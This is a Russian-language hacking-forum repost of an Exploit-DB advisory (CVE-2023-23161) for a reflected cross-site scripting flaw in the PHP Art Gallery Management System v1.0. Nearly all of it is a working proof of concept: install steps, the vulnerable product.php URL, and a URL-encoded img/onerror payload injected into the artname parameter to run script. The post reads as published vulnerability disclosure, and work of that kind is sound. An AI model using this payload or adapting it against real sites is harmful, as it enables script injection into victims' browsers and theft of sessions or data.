Exploit Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)

  • Автор темы Exploiter
  • Дата начала
  • Просмотров 2379 Просмотров

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
51214
Проверка EDB
  1. Пройдено
Автор
RAHUL PATWARI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2023-23161
Дата публикации
2023-04-03
Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
Код:
# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on:  XAMPP / Windows 10
# CVE :  CVE-2023-23161

# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0

# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints

# 3- Now Insert XSS Payload on artname parameter.
the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E

# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E

# 5- XSS has been triggered.

# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
"
XSS will trigger.
 
Источник
www.exploit-db.com

Похожие темы